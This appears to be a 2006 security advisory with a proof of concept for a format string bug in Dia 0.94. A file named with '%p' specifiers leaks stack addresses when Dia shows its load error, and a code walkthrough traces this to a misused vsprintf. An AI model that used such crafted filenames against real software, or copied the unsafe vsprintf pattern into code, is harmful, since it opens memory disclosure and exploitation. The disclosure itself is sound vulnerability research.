('binary' encoding is not supported, stored as-is)
Author : KaDaL-X
http://kandangjamur.net
Software tested
Dia v 0.94 on fedora Core 4
Dia v 0.94 on Mandriva
http://www.gnome.org/projects/dia
PoC :
------
[ph03n1x_at_kaiten ~]$ touch %p%p%p%p.bmp
Now, open %p%p%p%p.bmp using dia then error something like this will happen
Failed to load:
Couldn't recognize the image file format for file
'0xbfec1a480xc0cf670x89608b00x9f247e.bmp'
Code analisys:
--------------
in plug-ins/pixbuf/pixbuf.c line 152
else if (error) /* otherwise a pixbuf misbehaviour */
{
message_warning ("Failed to load:\n%s", error->message);
g_error_free (error);
}
then in lib/message.c line 220
message_warning(const char *format, ...)
{
va_list args, args2;
va_start (args, format);
va_start (args2, format);
message_internal(_("Warning"), format, &args, &args2);
va_end (args);
va_end (args2);
}
On lib/message.c line 187 message_internal has been defined as
static MessageInternal message_internal = gtk_message_internal;
Now, analizyng gtk_message_internal() function on lib/message.c on line
157
vsprintf() function was used incorrectly
vsprintf (buf, fmt, *args2);
The second argument of vsprintf must be a constant string, based on
/usr/include/stdio.h
Received on May 08 2006
Intro
